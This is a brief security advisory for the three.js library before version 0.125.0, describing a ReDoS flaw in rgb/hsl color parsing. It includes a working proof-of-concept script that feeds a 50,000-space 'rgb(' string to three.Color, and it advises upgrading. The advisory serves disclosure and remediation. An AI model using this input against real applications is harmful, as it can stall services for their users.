three
before version 0.125.0 is vulnerable to Regular Expression Denial of Service (ReDoS). This can happen when handling rgb or hsl colors.
var three = require('three')
function build_blank (n) {
var ret = "rgb("
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")
Upgrade to version 0.125.0 or later